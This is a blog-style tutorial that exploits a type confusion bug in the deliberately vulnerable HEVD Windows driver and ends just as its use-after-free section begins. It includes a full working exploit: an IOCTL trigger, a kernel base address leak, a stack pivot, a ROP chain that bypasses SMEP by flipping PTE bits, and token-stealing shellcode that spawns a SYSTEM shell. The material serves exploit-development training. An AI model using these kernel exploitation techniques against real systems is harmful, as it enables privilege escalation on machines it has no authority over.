In previous post, we walked through some mitigation methods implemented in Windows and now let’s get start with exploiting some kernel driver vulnerabilities in HEVD.

Table of Contents

Type Confusion Vulnerability
IDA Analysis
Exploitation
Error 1: EXCEPTION_DOUBLE_FAULT
Error 2: IRQL_NOT_LESS_OR_EQUAL
Use-After-Free Vulnerability
IDA Analysis
AllocateUaFObjectNonPagedPool
FreeUaFObjectNonPagedPool
UseUaFObjectNonPagedPool
AllocateFakeObjectNonPagedPool
Exploitation

Type Confusion Vulnerability

HEVD has specific function for Type Confusion vulnerability which is TypeConfusionIoctlHandler whose IOCTL code is 0x222023.

Before getting into the vulnerability, let’s learn a bit about what’s type casting.

Type casting in C/C++ is converting a variable from one data type to another. The purpose of type casting in C/C++ is to allow compatibility between different data types, enabling operations, comparisons, or assignments that wouldn't be allowed otherwise.

For example, You can cast an int to a float to perform precise mathematical calculations or cast a void* to a specific pointer type to access its data.

There are different types of casting in C/C++, the classic C-style casting which is applicable for C++ too:

int a = 10;
float b = (float)a; // C-style cast

This is C++ static_cast type casting method:

int a = 10;
float b = static_cast<float>(a); // C++ static_cast

The others are dynamic_cast and reinterpret_cast, different type castings are used for different scenarios. Also, each type casting has difference in checks during compile-time or runtime to ensure safe and intended behavior.

The C-style cast is not type-safe and can lead to undefined behavior if misused. And they are not checked by compiler and causes issue in runtime. The static_cast is checked by the compiler but not in runtime and it’s still dangerous to use. The dynamic_cast is checked at runtime which makes it safer to use but it could cause performance overhead, so it’s not being used much.

Reference:

IDA Analysis

Things goes wrong when there is a misinterpretation of type casting. Let’s get back to the TypeConfusionIoctlHandler, this function makes a call to TriggerTypeConfusion function with the user input (IO_STACK_LOCATION→Parameters.DeviceIoControl.Type3InputBuffer == IrpSp+0x20).

The TriggerTypeConfusion function takes 1 argument (pointer to user input) which is USER_TYPE_CONFUSION_OBJECT structure. And this structure contains 2 members ObjectID and ObjectType.

So the user input is a structure (USER_TYPE_CONFUSION_OBJECT) of 0x10 bytes and it’s denoted as UserTypeConfusionObject variable which is then moved to RBX register (1️⃣) [ RBX = UserTypeConfusionObject(USER_TYPE_CONFUSION_OBJECT) ].

Moving on, there is a call to ExAllocatePoolWithTag() API 2️⃣ which allocates pool memory of the specified type and returns a pointer of the allocated block and here it allocates 0x10 bytes of NonPagedPool type based on the arguments passed to it.

Interestingly it type cast the return pointer (PVOID) of ExAllocatedPoolWithTag to _KERNEL_TYPE_CONFUSION_OBJECT. But in assembly you won’t see this type casting, instead the returned address will simply be copied into the PoolWithTag variable (mov r14, rax 3️⃣ where r14 is PoolWithTag 1️⃣ which is _KERNEL_TYPE_CONFUSION_OBJECT structure) [ R14 = PoolWithTag (KERNEL_TYPE_CONFUSION_OBJECT) ].

In assembly, everything boils down to raw bits and bytes. The concept of "types" or “type casting” that we're familiar with from high-level languages (like int, float, char, etc.) simply doesn't exist at the assembly level.

Checking _KERNEL_TYPE_CONFUSION_OBJECT structure, it contains 2 members, the first member is ObjectID and the second member is an UNION which contains 2 members ObjectType and Callback.

Something to know about UNION, that all members of a union share the same memory location. The size of a union is determined by its largest member. In this case, both ObjectType and Callback are 8 bytes (on 64-bit systems), so they occupy the same 8 bytes.

Moving on, there are few operations happening here, let’s have a quick recall about the registers,

RBX is the pointer to the user input UserTypeConfusionObject, which is an instance of the USER_TYPE_CONFUSION_OBJECT structure.
R14 points to a memory region allocated using ExAllocatePoolWithTag(). This memory is type-cast into PoolWithTag which is a KERNEL_TYPE_CONFUSION_OBJECT structure.

1️⃣ it dereferences RBX register, copying the first 8 bytes to RAX register. According to USER_TYPE_CONFUSION_OBJECT (UserTypeConfusionObject) the first member is ObjectID so RAX holds ObjectID.
2️⃣ the RAX value (which contains ObjectID) is copied to the address pointed to by R14, which is the newly allocated region and it’s a KERNEL_TYPE_CONFUSION_OBJECT (PoolWithTag) structure, and it’s first 8 bytes is ObjectID as well. This means it copies the UserTypeConfusionObject->ObjectID to PoolWithTag->ObjectID.
3️⃣ it dereference RBX+8, fetching the next 8 bytes of USER_TYPE_CONFUSION_OBJECT (which is ObjectType member) to RAX register.
4️⃣ the RAX value (now holding ObjectType) is copied to the address R14+8, This position in the KERNEL_TYPE_CONFUSION_OBJECT is a UNION with two members. Here is the interesting thing, both the members of this UNION are 8 bytes, so it can be either ObjectType or Callback.

typedef struct _USER_TYPE_CONFUSION_OBJECT {
    unsigned __int64 ObjectID;
    unsigned __int64 ObjectType;
} KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;

typedef struct _KERNEL_TYPE_CONFUSION_OBJECT {
    unsigned __int64 ObjectID;
    union {
        unsigned __int64 ObjectType;
        void (*Callback);
    };
} KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;

Let’s have a look at how UNION causes the type confusion here, as I explained earlier, the size of a union is determined by its largest member. Here is a quick example.

#include <stdio.h>

int main() {

    char secret[10] = "1337";

    union Data {
        void* normalcall;     // 8 bytes
        void* maliciouscall;  // 8 bytes
    };

    union Data data;
    data.normalcall = &secret;

    printf("Size of union: %lu bytes\n", sizeof(data));
    printf("normalcall value: %p\n", data.normalcall);
    printf("maliciouscall value: %p\n", data.maliciouscall);
}

We define a union named Data with two members: normalcall and maliciouscall, both of which are pointers (void*), typically 8 bytes on a 64-bit system.
A char array named secret is initialized with the string "1337".
We assign the address of secret to data.normalcall. This means data.normalcall now points to the start of the secret array.
We print the size of the union. Since both members are 8 bytes, the size of the union is 8 bytes, the size of its largest member.
We print the value of data.normalcall, which will show the address of secret.
We then print the value of data.maliciouscall. Even though we never explicitly assigned a value to maliciouscall, let’s see what we get.

By executing the binary,

We get the size of the union, which is 8 bytes.
Next, we see the address stored in normalcall, which points to the address of secret. That seems correct.
Then we print the maliciouscall and that also prints the same address? This demonstrates that the union shares the same memory space. Because of this shared memory, even if the application retrieves the address from maliciouscall, it will still be the address stored in normalcall.
This behavior applies regardless of differing data types; it depends on how the application or binary handles the data.

> .\binary.exe
Size of union: 8 bytes
normalcall value: 000000FC539EFCB0
maliciouscall value: 000000FC539EFCB0

In the example above, both members are 8 bytes (void). However, let's consider a scenario where one member is an int (4 bytes) and the other is void (8 bytes). The overall size would still be 8 bytes, meaning it can hold upto 8 bytes of data. When I say it depends on how the application handles the data, I mean that if the program reads the int, it will only take the first 4 bytes. However, if it then uses the second member of the UNION, which is the void (pointer), it will interpret the 8 bytes that were stored. The application can still protect against this by verifying that the received data is only 4 bytes (for the int) and blocking the input if it detects that you provided 8 bytes for the second UNION member.

Back to IDA, 2️⃣ there is a call to TypeConfusionObjectInitializer and before that call 1️⃣ there is a mov operation where it copies R14 register to UserTypeConfusionObject (RCX register). If you scroll above you know that R14 is the PoolWithTag (_KERNEL_TYPE_CONFUSION_OBJECT). So this structure is provided as an argument to TypeConfusionObjectInitializer call.

TypeConfusionObjectInitializer

1️⃣ defines that RCX (the input _KERNEL_TYPE_CONFUSION_OBJECT) is considered as KernelTypeConfusionObject.
2️⃣ the KernelTypeConfusionObject is copied to RBX register.
3️⃣ then it dereference RBX+8 which is the 2nd member (UNION) and it calls that value.

We already know that _KERNEL_TYPE_CONFUSION_OBJECT holds 2 members: ObjectID and a union (ObjectType & Callback). If you see the source code of this function, it makes a call to the Callback member.

typedef struct _KERNEL_TYPE_CONFUSION_OBJECT {
    unsigned __int64 ObjectID;
    union {
        unsigned __int64 ObjectType;
        void (*Callback);
    };
} KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;

We know that the user input’s (USER_TYPE_CONFUSION_OBJECT) ObjectType is copied to _KERNEL_TYPE_CONFUSION_OBJECT’s ObjectType. Since it is a member of the union, it also shares the same memory space with Callback. As a result, when the call occurs, it actually invokes the value we sent in ObjectType.

Exploitation

Let’s try this theory, I wrote the following code, where I created a structure called _MY_USER_INPUT, this is what we are gonna send to the driver, it contains 2 members and I assigned them with dummy values for now. ObjectID contains 0x4141414141414141 and ObjectType contains 0x4242424242424242.

#include <Windows.h>
#include <stdio.h>
#include "ioctl.h"

typedef struct _MY_USER_INPUT {
    void* ObjectID;
    void* ObjectType; // Callback
} MY_USER_INPUT, *PMY_USER_INPUT;

int main()
{
    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);

    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Failed to open handle: %d", GetLastError());
        return 1;
    }

    _MY_USER_INPUT input;
    input.ObjectID = (LPVOID)(0x4141414141414141);
    input.ObjectType = (LPVOID)(0x4242424242424242); // Callback
        
    printf("[+] Calling TYPE_CONFUSION_VULN....");

    NTSTATUS success = DeviceIoControl(
        hDriver,
        TYPE_CONFUSION_VULN,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }
    return 0;

}

Since we know the IOCTL code to invoke TypeConfusionIoctlHandler function, using the online decoder I got rest of the information (I can just use the IOCTL code too).

Placed a breakpoint to the call to TriggerTypeConfusion function. Since our user-mode application calls the IOCTL of this function anyways.

Ran the user-mode application on the Debuggee machine and got hit. We can see the RCX contains the pointer to structure of what I sent.

Moving on, after the call to ExAllocatePoolWithTag() API, it copies the user input (RBX) to the newly allocated region (R14) PoolWithTag (_KERNEL_TYPE_CONFUSION_OBJECT).

Next, the call to TypeConfusionObjectInitializer that has the pointer to _KERNEL_TYPE_CONFUSION_OBJECT as an argument.

Moving on, we reach the call to [RBX+8] which is the _KERNEL_TYPE_CONFUSION_OBJECT’s second member Callback (union) function. So this means that this function will call whatever pointer we place in the ObjectType field.

Now that we know our attack path, we can try to execute our shellcode but SMEP is enabled so we can’t allocate some user-mode region using VirtualAlloc() and provide that address as ObjectType to execute, SMEP will block that, so we can try to disable it like before. But we can provide only one ROP gadget to ObjectType.

So if we get proper gadget, we can pivot the stack to user-mode and create a fake stack to execute rest of our ROP gadget to disable the SMEP. HVCI is disabled for this scenario.

I found this gadget using ROPGadget and address 0x83000000 is within the user-space (from 0 to 0x000007FFFFFEFFFF).

0x000000014059f24e : mov esp, 0x83000000 ; ret

Updated the POC and we need to bypass kASLR as well, so re-used the same getbaseaddress() that I used in my previous posts. Used VirtuaAlloc() to allocate the region (fake stack) and we know the address of the stack (0x83000000) that will be pivoted to, so used that as starting address (lpAddress) for VirtualAlloc().

#include <Windows.h>
#include <stdio.h>
#include "ioctl.h"
#include <psapi.h>

typedef struct _MY_USER_INPUT {
    void* ObjectID;
    void* ObjectType; // Callback
} MY_USER_INPUT, *PMY_USER_INPUT;

PVOID getbaseaddress()
{
    BOOL status;
    LPVOID* pImageBase;
    DWORD ImageSize;

    status = EnumDeviceDrivers(nullptr, 0, &ImageSize);

    pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

    status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);

    LPVOID ntaddr = pImageBase[0];

    return ntaddr;
}

int main()
{
    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);

    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Failed to open handle: %d", GetLastError());
        return 1;
    }

    LPVOID nt_addr = getbaseaddress();
    printf("[+] Nt base address: %p\n", nt_addr);

    _MY_USER_INPUT input;
    input.ObjectID = (LPVOID)(0x4141414141414141);
    input.ObjectType = (LPVOID)((uintptr_t)nt_addr + 0x0059f24e); // mov esp, 0x83000000 ; ret

    uintptr_t STACK_PIVOT = 0x83000000;
    LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT), 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    printf("[+] Allocated region: %p\n", fakeStack);
    
    getchar();
    printf("[+] Calling TYPE_CONFUSION_VULN....");

    NTSTATUS success = DeviceIoControl(
        hDriver,
        TYPE_CONFUSION_VULN,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }

    return 0;

}

Placed a breakpoint on the call to Callback and when it attempts to execute our stack pivot gadget, it ended up in an error:

Error 1: EXCEPTION_DOUBLE_FAULT

Analyzing the error, it’s an UNEXPECTED_KERNEL_MODE_TRAP and the first parameter (Arg1) shows 0x8 which is EXCEPTION_DOUBLE_FAULT. The third parameter (Arg3) shows the address 0x83000000 where the error occurred.

After some googling and reading the documentation and research of other researchers, I figured the following might have happened:

Once the stack pivot is performed, the kernel driver tried to access the user-mode address 0x83000000, and since this allocated region is just empty (since there is no data inside this region of 0x1000), it might be paged-out (Memory that has been temporarily moved from RAM to disk to free up space for active processes).
So when the driver tried to access 0x83000000, the MMU (memory management unit) walks the PTE (Page Table Entry) to find the physical address and since it’s paged out, the CPU will trigger an exception this is called page fault. In our scenario this is the first fault.
Usually to handle the page fault, the CPU tries to saves the current execution context (including registers and program counter) to a structure called a trap frame (_KTRAP_FRAME) in the stack. And in our scenario it couldn’t save it so the second fault occurred. This is the reason of EXCEPTION_DOUBLE_FAULT.

By using !pte command on the virtual address, it shows zeros, this means the region is paged-out mostly. And the page fault occurred to page-in this region.

According to the documentation, of this double fault, it might have occurred because the kernel tries to do stuffs in unmapped region:

The first cause is a kernel stack overflow. This overflow occurs when a guard page is hit, and the kernel tries to push a trap frame. Because there's no stack left, a stack overflow results, causing the double fault.

Let’s analyze this further, added getchar() before calling DeviceIoControl() and opened the user-mode application in VMMap.

Using VirtualAlloc() we allocated the address from 0x83000000 with 0x1000 bytes of region and Windows won’t work with bytes, it works with pages (4KB). Even you allocate a small region it allocates as a whole page. VirtualAlloc() sometimes allocate 64KB as a page for an efficient size for memory management and system performance.

This is the simple representation of what’s going on here. So I believe this is what might have happened, the kernel tried to access the address 0x83000000 and it’s paged-out so caused a page fault and the CPU tried to save the trap frame in the stack. Since the stack grows downwards and the allocated address is at the end of the page, the page before that it’s an unmapped region. The EXCEPTION_DOUBLE_FAULT error occurred.

The reason why I said this might be a reason is because, there is something else which we need to consider which is Interrupt Request Level (IRQL), so if the IRQL is running at higher level and it tries to page-in the user-space address it will also leads to BSOD. But more about this is covered in Error 2 topic (below).

To solve this issue, we can try the following:

We need to allocate some memory before the stack pivot address (0x83000000) for the trap frame or other kernel operations, because we pivoted the stack to user-space and kernel does more things so it’s better to allocate this region in our fake stack.
We need to make sure the allocated region is always paged-in, we can try this using VirtualLock() and we can also write some data inside this region to make sure it paged-in but the user-space address can not be guaranteed to be paged-in.

This is the updated POC,

Added a page 0x1000 (4KB) of space before the fake stack and also increased the total allocated region to 0x5000.
Used VirtualLock() to page-in the memory region and filled the whole allocated region with A’s (later I overwrite some with ROP).
After the pivot it lands to my ROP gadgets, which is just NOP; RET, just to see if the gadgets are being executed successfully.

uintptr_t STACK_PIVOT = 0x83000000;
LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT - 0x1000), 0x5000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
printf("[+] Allocated region: %p\n", fakeStack);
if (!VirtualLock(fakeStack, 0x5000)) {
    printf("Error using VirtualLock: %d\n", GetLastError());
}
memset(fakeStack, 'A', 0x5000);

int index = 0;
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc); // nop; ret
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc);
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc);

Back the callback() pointer and I checked the allocated region, this time it’s paged-in, and I can see the 3 ROP gadget too.

Even though, everything seems good, when I try to execute the ROP gadget to pivot the stack, it ended up again in the same EXCEPTION_DOUBLE_FAULT.

Not only that, the allocated region (< 0x83000000) above the stack pivot address (0x83000000) seems paged out.

Memory management is such a complex thing, I read few other researchers articles (referenced below) and this is my theory of what’s going on here, since I allocated a very smaller region 0x5000 (20KB) and even VirtualLock() call succeed in locking the page, it’s not always the case. There are some scenarios the memory will be silently paged-out (like what’s going on here). So I increased the region to bigger 0x10000 (64KB) size, as I explained earlier Windows works with pages and there is something called memory block, which is typically 64KB in size, this is for better allocation granularity.

uintptr_t STACK_PIVOT = 0x83000000;
LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
printf("[+] Allocated region: %p\n", fakeStack);
if (!VirtualLock(fakeStack, 0x10000)) {
    printf("Error using VirtualLock: %d\n", GetLastError());
}
memset(fakeStack, 'A', 0x10000);

int index = 0;
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc); // nop; ret
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc);
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc);

After compiling and running the new POC, I could see the allocated region (< 0x83000000) above the pivot stack, where I see the assigned A’s. And followed by that, the ROP gadget to pivot the stack is executed successfully.

Error 2: IRQL_NOT_LESS_OR_EQUAL

Now that the stack pivot was successful (it reached the ret instruction, it didn’t previously), it should execute the other ROP gadgets (NOP; RET) from the stack but that’s not the case.

It ended up in IRQL_NOT_LESS_OR_EQUAL. This error occurs only after the stack pivot and when it tires to execute my other ROP gadgets.

Arg1 shows the address that couldn't be accessed and leads to the issue.
Arg2 shows the IRQL as 0xFF and it states itself (highlighted) that it attempted to access paged out or invalid memory region at a higher IRQL.

Let’s have a brief explanation about Interrupt Request Level (IRQL):

In Windows, there is a concept called Interrupts, an interrupt is a signal from hardware or software indicating an event that needs immediate attention. They temporarily halt the current code execution, allowing the interrupt handler (a specific routine) to execute. Once the interrupt is handled, the processor resumes the previous task.

Interrupt Request Level (IRQL) determines the priority of the interrupts. It is a associated with the CPU. There are different IRQL levels:

PASSIVE_LEVEL (0) - Normal user-mode/kernel-mode execution.
APC_LEVEL (1) - Asynchronous Procedure Calls.
DISPATCH_LEVEL (2) - Thread scheduling, DPCs.
DIRQL (3-26) - Device interrupts.
POWER_LEVEL (30) - Power failure handling.
HIGH_LEVEL (31) - Used for critical system operations.

Here is a quick example:

When you press a key in the keyboard, the keyboard controller sends an interrupt signal to the CPU.
Let’s say there is a processor running some task at a low IRQL while processing regular tasks (e.g., IRQL = 0, PASSIVE_LEVEL).
The keyboard interrupt might be assigned a higher IRQL (e.g., IRQL = 1, DISPATCH_LEVEL).
The CPU temporarily pauses the low IRQL task, processes the keyboard interrupt, and then resumes the previously interrupted task once the interrupt handling is complete.

The most notable points we need in this situation are:

At Low IRQLs (PASSIVE_LEVEL): The system can handle page faults because it can pause the current thread, fetch the required page from disk, and then resume execution.
At High IRQLs (DISPATCH_LEVEL and above): The system cannot handle page faults because paging operations (disk I/O) will take time. Since high IRQL levels must be serviced immediately and cannot wait for such operations, it could result in a crash (bug check).

Now with that in mind, after some analysis, following is my understanding:

Scenario 1:

Initially, the driver operates at an IRQL below DISPATCH_LEVEL. However, when we interact with the specific IOCTL, at certain conditions it may trigger an escalation of the IRQL to a level higher than DISPATCH_LEVEL. This escalation will ensure that other processors halt their operations, allowing this task to proceed.
During this high IRQL operation, the driver attempts to access the ROP gadgets located in user-space memory (0x83000000). Even though we tried to lock the memory regions using VirtualLock to prevent paging, as I said earlier there is no guarantee that these pages remain resident in memory at all times.
According to MSDN: When you lock memory with VirtualLock it locks the memory into your process's working set. It doesn't mean that the memory will never be paged out. It just means that the memory won't be paged out as long as there is a thread executing in your process, because a process's working set needs be present in memory only when the process is actually executing.
So if the memory is paged out and a page fault occurs, the system cannot handle the page fault at this elevated IRQL. Consequently, this situation leads to a IRQL_NOT_LESS_OR_EQUAL error, as the system is unable to resolve the page fault while operating at a high IRQL.

I have 2 virtual processors in my machine and as you can see in this scenario, the IRQL is escalated to 13 and caused the IRQL_NOT_LESS_OR_EQUAL error.

Scenario 2:

However, the above scenario is not consistent. There are some instances where the exploit works successfully. This might be because when the processor accesses the ROP gadget while the IRQL remains at a lower level. In this scenario, even if the memory is initially paged out, the system can page it back in without any issues, as the lower IRQL allows the page fault to be handled appropriately. As a result, the exploit executes successfully without triggering an IRQL_NOT_LESS_OR_EQUAL error.

As you see in this scenario, the IRQL didn’t changed and the ROP gadget is executed successfully:

The results may vary depending on the hardware configuration of different machines. Systems with more RAM and additional processors may experience a higher success rate. In such cases the IRQL might not need to be raised as often, and the system can handle tasks more smoothly.

User-mode cannot control the page-in process. Even if you use VirtualLock or other user-mode methods, the memory may or may not be paged-in, it depends on the system's load. So this concludes:

If the allocated memory is paged-in (stored in physical memory), everything works fine.
If the allocated memory is paged-out (stored in the page file) and a page fault occurs while the IRQL is higher, it cannot handle the page fault, leading to failure.
If the allocated memory is paged-out (stored in the page file) and a page fault occurs while the IRQL is lower, the memory can be paged-in successfully.

If we avoid scenario 1, the exploit will work fine. This depends on the machine load and it’s efficiency.

For the below POC, I used the same ROP gadgets which I used to bypass the SMEP & VBS, here (HVCI is disabled).

Let’s start from the beginning, after the stack pivot, it begins to execute the ROP and the fake stack frame looks good, and it does the same operation to bypass SMEP & VBS, it find’s the PTE of the shellcode and flips the “U” flag to “K” and execute the shellcode.

It worked, by exploiting TypeConfusion vulnerability, it gives a shell as SYSTEM.

Full POC:

#include <Windows.h>
#include <stdio.h>
#include "ioctl.h"
#include <psapi.h>

typedef struct _MY_USER_INPUT {
    void* ObjectID;
    void* ObjectType; // Callback
} MY_USER_INPUT, *PMY_USER_INPUT;

PVOID getbaseaddress()
{
    BOOL status;
    LPVOID* pImageBase;
    DWORD ImageSize;

    status = EnumDeviceDrivers(nullptr, 0, &ImageSize);

    pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

    status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);

    LPVOID ntaddr = pImageBase[0];

    return ntaddr;
}

uintptr_t MiGetPte(LPVOID lpMemory) {
    uintptr_t addr = reinterpret_cast<uintptr_t>(lpMemory);

    uintptr_t calc1 = addr >> 9; // shr rcx, 9 
    uintptr_t calc2 = calc1 & 0x7FFFFFFFF8; // and rax, rcx

    return calc2;
}

int main()
{
    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);

    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Failed to open handle: %d", GetLastError());
        return 1;
    }

    LPVOID nt_addr = getbaseaddress();
    printf("[+] Nt base address: %p\n", nt_addr);

    BYTE shellcode[256] = {
    0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
    0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
    0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
    0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
    0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
    0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
    0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
    0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
    0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
    0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
    0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
    0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
    0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
    0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff
    };

    LPVOID lpMemory = VirtualAlloc(NULL, sizeof(shellcode), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);
    printf("[+] Shellcode address: %p\n", lpMemory);
    memcpy(lpMemory, shellcode, sizeof(shellcode));

    uintptr_t ShellcodePte = MiGetPte(lpMemory);
    printf("[+] PTE calculated shellcode address: %p\n", (void*)ShellcodePte);

    _MY_USER_INPUT input;
    input.ObjectID = (LPVOID)(0x4141414141414141);
    input.ObjectType = (LPVOID)((uintptr_t)nt_addr + 0x0059f24e); // mov esp, 0x83000000 ; ret

    uintptr_t STACK_PIVOT = 0x83000000;
    LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    printf("[+] Allocated region: %p\n", fakeStack);
    if (!VirtualLock(fakeStack, 0x10000)) {
        printf("Error using VirtualLock: %d\n", GetLastError());
    }
    memset((LPVOID)fakeStack, 0x10000, '\x41');
    int index = 0;
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc); // nop; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00202e71); // pop rcx; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)ShellcodePte; // Shellcode in user-mode
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00201862); // pop rax; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); // nt!MiGetPteAddress+0x13
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0027bcbf); // mov rax, qword ptr [rax]; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0020e204); // add rax, rcx; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00201861); // pop r8 ; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)(0xfffffffffffffffc); // -4
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x003fd49b); // add qword ptr [rax], r8 ; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = lpMemory; // Shellcode in user-mode

    // getchar();
    printf("[+] Calling TYPE_CONFUSION_VULN....");

    NTSTATUS success = DeviceIoControl(
        hDriver,
        TYPE_CONFUSION_VULN,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }

    printf("[+] Spawning a shell with elevated privileges\n\n");
    system("cmd");

    return 0;

}

Use-After-Free Vulnerability

A Use-After-Free (UAF) vulnerability occurs when a program continues to use a pointer to a memory region that has already been freed or deallocated. This vulnerability arises when the reference to the freed memory is not properly set to NULL, allowing the program to inadvertently reuse the pointer. If the freed memory is reallocated for another purpose, reusing the old pointer can lead to undefined behavior and potentially arbitrary code execution. It’s also called as dangling pointer.

In HEVD, we will be using multiple functions to perform UAF attack:

AllocateUaFObjectNonPagedPool (0x222013) - This function will allocate a NonPagedPool of 0x60 bytes with a tag “Hack” and store the pointer to the region in a global variable.
FreeUaFObjectNonPagedPool (0x22201B) - This function will free the allocated region using the global variable but forgets to set NULL to the global variable which makes it as a dangling pointer.
UseUaFObjectNonPagedPool (0x222017) - This function will use the global variable pointer and get the first 8 bytes (pointer) and execute it.
AllocateFakeObjectNonPagedPool (0x22201F) - This function will allocate a NonPagedPool of 0x58 bytes with user’s input, which will be used to exploit this vulnerability.

This is just a small explanation about the functions, more about this explained below.

IDA Analysis

AllocateUaFObjectNonPagedPool

